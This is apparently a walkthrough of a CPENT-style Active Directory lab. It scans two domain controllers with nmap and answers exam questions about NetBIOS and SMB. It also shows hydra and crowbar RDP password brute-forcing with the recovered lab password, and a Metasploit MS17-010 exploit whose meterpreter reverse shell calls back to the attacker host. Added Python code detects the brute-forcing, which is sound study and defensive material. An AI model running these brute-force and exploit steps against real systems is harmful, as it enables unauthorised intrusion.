AD range (1)
Problem statement (screenshots):
Network diagram for the exercise above (the exam obviously does not provide this diagram):
Attacking 172.16.170.30; the related questions are:
2 (Challenge 1) What is the 16th Byte NETBIOS name on the machine at 172.25.170.30?
3 (Challenge 2) What is the role of the machine at 172.25.170.30? Based on the 16th byte?
5 (Challenge 4) What is the status of the smb2 signing on the machine at 172.25.170.30?
6 (Challenge 5) What NetBIOS domain name for the machine connected at 172.25.170.30?
7 (Challenge 6) What is the NetBIOS name of the computer at 172.25.170.30?
Naturally, the first step is an nmap scan:
┌──(kali㉿kali)-[~]
└─$ nmap -p- 172.16.170.30
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 21:25 EDT
Nmap scan report for 172.16.170.30
Host is up (0.048s latency).
Not shown: 65509 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49672/tcp open unknown
49677/tcp open unknown
49690/tcp open unknown
49720/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 35.68 seconds
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# nmap -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,47001,49664-49672,49677,49690,49720 172.16.170.30 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 21:30 EDT
Nmap scan report for 172.16.170.30
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-02 01:31:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COMMANDER.LOCALNET, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: COMMANDERTWO)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COMMANDER.LOCALNET, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: COMMANDERTWO
| NetBIOS_Domain_Name: COMMANDERTWO
| NetBIOS_Computer_Name: COMMANDER
| DNS_Domain_Name: COMMANDER.LOCALNET
| DNS_Computer_Name: COMMANDER.COMMANDER.LOCALNET
| Product_Version: 10.0.14393
|_ System_Time: 2023-04-02T01:32:10+00:00
| ssl-cert: Subject: commonName=COMMANDER.COMMANDER.LOCALNET
| Not valid before: 2023-03-17T02:14:34
|_Not valid after: 2023-09-16T02:14:34
|_ssl-date: 2023-04-02T01:32:20+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp closed unknown
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/1%OT=53%CT=49668%CU=43240%PV=Y%DS=2%DC=T%G=Y%TM=6428
OS:DB24%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10F%TI=I%TS=A)OPS(O1=M50
OS:7NW8ST11%O2=M507NW8ST11%O3=M507NW8NNT11%O4=M507NW8ST11%O5=M507NW8ST11%O6
OS:=M507ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF
OS:=Y%T=80%W=2000%O=M507NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=N)
Network Distance: 2 hops
Service Info: Host: COMMANDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-02T01:32:12
|_ start_date: 2023-04-02T01:04:49
|_clock-skew: mean: 1h24m00s, deviation: 3h07m50s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: COMMANDER
| NetBIOS computer name: COMMANDER\x00
| Domain name: COMMANDER.LOCALNET
| Forest name: COMMANDER.LOCALNET
| FQDN: COMMANDER.COMMANDER.LOCALNET
|_ System time: 2023-04-01T18:32:11-07:00
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
TRACEROUTE (using port 49668/tcp)
HOP RTT ADDRESS
1 65.06 ms 192.168.200.1
2 14.97 ms 172.16.170.30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.32 seconds
Challenge 4: What is the status of the smb2 signing on the machine at 172.25.170.30? The answer is "enabled":
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Challenge 5: What NetBIOS domain name for the machine connected at 172.25.170.30? Look at the result for port 3389: it is COMMANDERTWO.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: COMMANDERTWO
| NetBIOS_Domain_Name: COMMANDERTWO
| NetBIOS_Computer_Name: COMMANDER
| DNS_Domain_Name: COMMANDER.LOCALNET
| DNS_Computer_Name: COMMANDER.COMMANDER.LOCALNET
| Product_Version: 10.0.14393
|_ System_Time: 2023-04-02T01:32:10+00:00
| ssl-cert: Subject: commonName=COMMANDER.COMMANDER.LOCALNET
Challenge 6: What NetBIOS name of the machine connected at 172.25.170.30?
It is commander (look at the NetBIOS computer name). Although the NetBIOS name can be learned from outside with an nmap scan, the 16th-byte NetBIOS name asked for in Challenge 1 can only be obtained after getting into the machine:
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: COMMANDER
| NetBIOS computer name: COMMANDER\x00
| Domain name: COMMANDER.LOCALNET
| Forest name: COMMANDER.LOCALNET
| FQDN: COMMANDER.COMMANDER.LOCALNET
|_ System time: 2023-04-01T18:32:11-07:00
Seeing "88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-02 01:31:03Z)" means this is definitely AD. Now the actual intrusion: since 3389 is open, first use hydra to guess passwords (this run was done on someone else's VM):
┌──(root💀kali)-[/home/kali]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt rdp://172.16.170.30
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-01 22:18:15
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1820 login tries (l:35/p:52), ~455 tries per task
[DATA] attacking rdp://172.16.170.30:3389/
[STATUS] 495.00 tries/min, 495 tries in 00:01h, 1332 to do in 00:03h, 4 active
[STATUS] 461.67 tries/min, 1385 tries in 00:03h, 444 to do in 00:01h, 4 active
[3389][rdp] host: 172.16.170.30 login: cpent password: Pa$$w0rd123
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-01 22:22:14
On my own VM (which also cannot attack through a MobaXterm connection; the VM has to be used directly), brute forcing only worked after installing crowbar. The command is:
┌──(root㉿kali)-[/home/kali]
└─# crowbar -b rdp -s 172.16.170.30/32 -U Usernames-CPENT.txt -C Passwords-CPENT.txt -v
2023-04-23 00:44:29 START
2023-04-23 00:44:29 Crowbar v0.4.2
2023-04-23 00:44:29 Brute Force Type: rdp
2023-04-23 00:44:29 Output File: /home/kali/crowbar.out
2023-04-23 00:44:29 Log File: /home/kali/crowbar.log
2023-04-23 00:44:29 Discover Mode: False
2023-04-23 00:44:29 Verbose Mode: 1
2023-04-23 00:44:29 Debug Mode: False
2023-04-23 00:44:29 Trying 172.16.170.30:3389
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:password
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:123456
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:cooper
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:diamond
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:12345678
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:12345
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:scorpio
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:qwerty
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:testing
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:jasmine
2023-04-23 00:44:31 LOG-RDP: 172.16.170.30:3389 - administrator:kevin
...so many
2023-04-23 00:49:05 LOG-RDP: 172.16.170.30:3389 - cpent:puppettwo
2023-04-23 00:49:05 LOG-RDP: 172.16.170.30:3389 - cpent:studentpw
2023-04-23 00:49:05 RDP-SUCCESS : 172.16.170.30:3389 - cpent:Pa$$w0rd123
2023-04-23 00:49:05 LOG-RDP: 172.16.170.30:3389 - cpent:cpent123
2023-04-23 00:49:06 LOG-RDP: 172.16.170.30:3389 - cpent:cpent@123
2023-04-23 00:49:06 LOG-RDP: 172.16.170.30:3389 - cpent:cpent123456
...so many
2023-04-23 00:50:18 LOG-RDP: 172.16.170.30:3389 - :eccpw
2023-04-23 00:50:18 LOG-RDP: 172.16.170.30:3389 - :
2023-04-23 00:50:19 STOP
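The hydra and crowbar runs above are what a defender sees as a burst of failed logons from one source in the target's Windows Security log. The following Python detector is an added example (my own code, not from this write-up): it walks constructed Security-log style records (event 4625 = failed logon, 4624 = successful logon, with the logon type), flags a source once it produces a threshold of failures inside a sliding window, and flags any later success from that source as a likely guessed password. The sample events, the threshold and the window are assumptions to tune per environment.

```python
"""Spot RDP password guessing (as in the hydra/crowbar runs above) in the
target's Windows Security log.

Added example, not part of the original write-up. SAMPLE_EVENTS are
constructed tuples standing in for Security log records:
(timestamp, event_id, account, source_ip, logon_type). Logon type 3 is what
an NLA-protected RDP listener records for the credential check; type 10
(RemoteInteractive) appears once a desktop session actually starts.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

_t0 = datetime(2023, 4, 23, 0, 44, 29)  # constructed start time
SAMPLE_EVENTS = (
    # 30 failures in under a minute from one source, alternating accounts
    [(_t0 + timedelta(seconds=2 * i), 4625, ["administrator", "cpent"][i % 2], "10.0.0.5", 3)
     for i in range(30)]
    # then a success for one of the guessed accounts from the same source
    + [(_t0 + timedelta(seconds=61), 4624, "cpent", "10.0.0.5", 10)]
    # benign noise: one typo followed by a normal logon from another host
    + [(_t0 + timedelta(minutes=5), 4625, "alice", "10.0.0.9", 10),
       (_t0 + timedelta(minutes=5, seconds=20), 4624, "alice", "10.0.0.9", 10)]
)


def detect_bruteforce(events, threshold=10, window=timedelta(seconds=60)):
    """Sliding window of 4625 events per source IP.

    A source is flagged once it reaches `threshold` failures inside `window`;
    any later 4624 from a flagged source is reported as a likely successful
    guess. Returns a list of alert dicts in the order they were raised.
    """
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    accounts = defaultdict(set)     # src -> account names tried
    flagged = set()
    alerts = []
    for ts, event_id, account, src, logon_type in sorted(events, key=lambda e: e[0]):
        if event_id == 4625:
            q = failures[src]
            q.append(ts)
            accounts[src].add(account)
            while ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"type": "rdp_bruteforce", "src": src,
                               "failures": len(q), "accounts": sorted(accounts[src]),
                               "first": q[0], "last": ts})
        elif event_id == 4624 and src in flagged:
            alerts.append({"type": "bruteforce_success", "src": src,
                           "account": account, "logon_type": logon_type, "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

Two alerts come out of the sample: the brute-force flag on 10.0.0.5 after the tenth failure (both "administrator" and "cpent" having been tried), then the success for "cpent" from the same source; the single typo from 10.0.0.9 stays below threshold. The mitigations that make this noise instead of a breach are the ones the hydra warning already hints at: an account lockout or rate-limiting policy on the RDP listener, NLA, and not exposing 3389 without a gateway.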
After the password is cracked, log in with rdesktop:
┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.170.30 -g 90%
Autoselecting keyboard map 'en-us' from locale
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=COMMANDER.COMMANDER.LOCALNET
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=COMMANDER.COMMANDER.LOCALNET
Issuer: CN=COMMANDER.COMMANDER.LOCALNET
Valid From: Thu Mar 16 22:14:34 2023
To: Fri Sep 15 22:14:34 2023
Certificate fingerprints:
sha1: d36c7fa38851287a661e4293b1a0fea6ff04f3a8
sha256: 9701cc5a9f72839068a4191941e1ced3728b85b9c11b5ea71f409b90bc0a6ce8
Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
At the login screen, enter cpent/Pa$$w0rd123.
After logging in, this dashboard appears:
Google how to query NetBIOS:
Try the command highlighted in the screenshot above:
Use the -n parameter to list the local NetBIOS names:
Challenge 1 What is the 16th Byte NETBIOS name on the machine at 172.25.170.30?
1C
Challenge 2:
What is the role of the machine at 172.25.170.30? Based on the 16th byte?
The answer is shown in the figure below:
Next, attack 172.25.170.200; the related questions are:
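The 16th byte of a NetBIOS name is a service suffix, and the answer 1C above is the group name every domain controller registers for its domain. To make that concrete, here is an added Python example (my own code, not from this write-up) that parses an nbtstat -n style local name table, maps each suffix to the service it denotes, infers the host's role from the suffixes it registers, and builds the 16-byte wire form of a name. The name table below is constructed to resemble what a domain controller registers and assumes the highlighted command in the screenshot was nbtstat -n.

```python
"""Decode NetBIOS name-table entries and map the 16th-byte suffix to a role.

Added example, not part of the original write-up. SAMPLE_NBTSTAT is a
constructed name table in the shape of `nbtstat -n` output on a Windows DC.
"""
import re

# Well-known NetBIOS suffixes (the 16th byte). The UNIQUE/GROUP type matters:
# <1C> is a GROUP name that every DC of the domain registers, <1B> is the
# UNIQUE name held only by the domain master browser (PDC emulator).
NETBIOS_SUFFIXES = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger Service",
    ("20", "UNIQUE"): "File Server Service",
    ("1B", "UNIQUE"): "Domain Master Browser (PDC emulator)",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
}

SAMPLE_NBTSTAT = """
Ethernet0:
Node IpAddress: [172.16.170.30] Scope Id: []

                NetBIOS Local Name Table

       Name               Type         Status
    ---------------------------------------------
    COMMANDER      <00>  UNIQUE      Registered
    COMMANDERTWO   <00>  GROUP       Registered
    COMMANDERTWO   <1C>  GROUP       Registered
    COMMANDER      <20>  UNIQUE      Registered
    COMMANDERTWO   <1B>  UNIQUE      Registered
"""

# name, <suffix>, UNIQUE|GROUP, status; header and separator lines do not match
ENTRY_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.M)


def parse_name_table(text):
    """Return (name, suffix, type, status) tuples from nbtstat -n style output."""
    return [(n, s.upper(), t, st) for n, s, t, st in ENTRY_RE.findall(text)]


def describe_suffix(suffix, name_type):
    """Human-readable meaning of one suffix/type pair."""
    return NETBIOS_SUFFIXES.get((suffix.upper(), name_type), "Unknown or unlisted suffix")


def infer_role(entries):
    """Classify the host from the suffixes it has registered."""
    registered = {(s, t) for _, s, t, _ in entries}
    if ("1C", "GROUP") in registered:
        return "Domain Controller"
    if ("20", "UNIQUE") in registered:
        return "File server / member host"
    return "Workstation"


def encode_netbios_name(name, suffix):
    """16-byte NetBIOS name: 15 ASCII chars padded with spaces, then the suffix byte."""
    padded = name.upper().encode("ascii")[:15].ljust(15, b" ")
    return padded + bytes([int(suffix, 16)])


if __name__ == "__main__":
    entries = parse_name_table(SAMPLE_NBTSTAT)
    for name, suffix, name_type, status in entries:
        print(f"{name:<15} <{suffix}> {name_type:<6} {describe_suffix(suffix, name_type)}")
    print("Inferred role:", infer_role(entries))
```

From an inventory point of view the interesting bit is the GROUP <1C> registration: any host advertising it claims to be a domain controller, so a <1C> showing up on a machine that is not in the DC inventory is worth a ticket.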
4 (Challenge 3) What is the 16th Byte NETBIOS name of the machine at 172.25.170.200?
8 (Challenge 7) What is the domain name on the machine at 172.25.170.200?
9 (Challenge 8) What is the status of the smb2 signing on the machine at 172.25.170.200?
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.170.200
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 22:14 EDT
Nmap scan report for 172.16.170.200
Host is up (0.024s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49169/tcp open unknown
49192/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 104.59 seconds
┌──(root㉿kali)-[~]
└─# nmap -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49154-49159,49169,49192 172.16.170.200 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 22:21 EDT
Nmap scan report for 172.16.170.200
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-02 02:21:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ECC.LOCALNET, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2012 R2 Datacenter 9600 microsoft-ds (workgroup: ECC)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ECC.LOCALNET, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2023-04-02T02:22:56+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: ECC
| NetBIOS_Domain_Name: ECC
| NetBIOS_Computer_Name: 2012-DC
| DNS_Domain_Name: ECC.LOCALNET
| DNS_Computer_Name: 2012-DC.ECC.LOCALNET
| Product_Version: 6.3.9600
|_ System_Time: 2023-04-02T02:22:17+00:00
| ssl-cert: Subject: commonName=2012-DC.ECC.LOCALNET
| Not valid before: 2023-03-17T01:04:48
|_Not valid after: 2023-09-16T01:04:48
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp filtered unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49192/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 2012-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m49s, median: 0s
| smb2-security-mode:
| 302:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: 2012-DC, NetBIOS user: <unknown>, NetBIOS MAC: 00155d01363f (Microsoft)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2023-04-02T02:22:16
|_ start_date: 2023-04-02T16:04:46
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: 2012-DC
| NetBIOS computer name: 2012-DC\x00
| Domain name: ECC.LOCALNET
| Forest name: ECC.LOCALNET
| FQDN: 2012-DC.ECC.LOCALNET
|_ System time: 2023-04-01T19:22:16-07:00
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 21.21 ms 192.168.200.1
2 30.99 ms 172.16.170.200
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.62 seconds
Challenge 7:
What is the domain name on the machine at 172.25.170.200?
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: 2012-DC
| NetBIOS computer name: 2012-DC\x00
| Domain name: ECC.LOCALNET
| Forest name: ECC.LOCALNET
Answer: ECC.LOCALNET
Challenge 8:
What is the status of the smb2 signing on the machine at 172.25.170.200?
| smb2-security-mode:
| 302:
|_ Message signing enabled and required
Look it up:
SMB has these versions:
Following the highlighted part of the web page above, enumerate the SMB-related information in detail:
┌──(root㉿kali)-[~]
└─# nmap -p445 --script smb-protocols 172.16.170.200
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 23:06 EDT
Nmap scan report for 172.16.170.200
Host is up (0.013s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 202
| 210
| 300
|_ 302
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
This means SMB v1 through v3 are all enabled; the screenshot should capture the 202 and 210 lines above together with the nmap website:
The answer can also be obtained from nmap: Enabled
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
Challenge 3:
What is the 16th Byte NETBIOS name of the machine at 172.25.170.200?
Because SMBv1 is enabled, it is not necessarily 1C. We still need to guess the password and get into .200 to check:
┌──(root💀kali)-[/home/kali]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt rdp://172.16.170.200
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-01 23:22:58
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1820 login tries (l:35/p:52), ~455 tries per task
[DATA] attacking rdp://172.16.170.200:3389/
[3389][rdp] host: 172.16.170.200 login: administrator password: Pa$$w0rd123
[ERROR] freerdp: The connection failed to establish.
Port 3389 is open, so Remote Desktop is available; the run above also guessed the password for port 3389:
┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.170.200 -g 90%
Autoselecting keyboard map 'en-us' from locale
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=2012-DC.ECC.LOCALNET
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=2012-DC.ECC.LOCALNET
Issuer: CN=2012-DC.ECC.LOCALNET
Valid From: Thu Mar 16 21:04:48 2023
To: Fri Sep 15 21:04:48 2023
Certificate fingerprints:
sha1: d38a5cd96f6c6ac2239af2c7135a54086257f5d2
sha256: 72086660adaf8e7628cdd8cef5520604654f2e4d2f3ae0a0fd9583aef90da2ad
Do you trust this certificate (yes/no)? yes
Log in to Remote Desktop with the administrator credentials just guessed:
Open cmd:
So the answer is again 1C.
From the nmap scan, the smb-security-mode is as follows:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
With these settings on Windows Server 2012 R2, it is reasonable to suspect MS17-010, so attack with the MS17-010 PoC in msfconsole:
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 172.16.170.200
rhosts => 172.16.170.200
msf6 exploit(windows/smb/ms17_010_psexec) > set lhost 192.168.200.7
lhost => 192.168.200.7
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.200.7:4444
[*] 172.16.170.200:445 - Target OS: Windows Server 2012 R2 Datacenter 9600
[*] 172.16.170.200:445 - Built a write-what-where primitive...
[+] 172.16.170.200:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.170.200:445 - Selecting PowerShell target
[*] 172.16.170.200:445 - Executing the payload...
[+] 172.16.170.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.170.200
[*] Meterpreter session 1 opened (192.168.200.7:4444 -> 172.16.170.200:51546) at 2023-04-01 07:36:18 -0400
meterpreter > sessions -l
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name : Microsoft Hyper-V Network Adapter
Hardware MAC : 00:15:5d:01:36:3f
MTU : 1500
IPv4 Address : 172.16.170.200
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::3081:c951:c3b6:d52
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:ac10:aac8
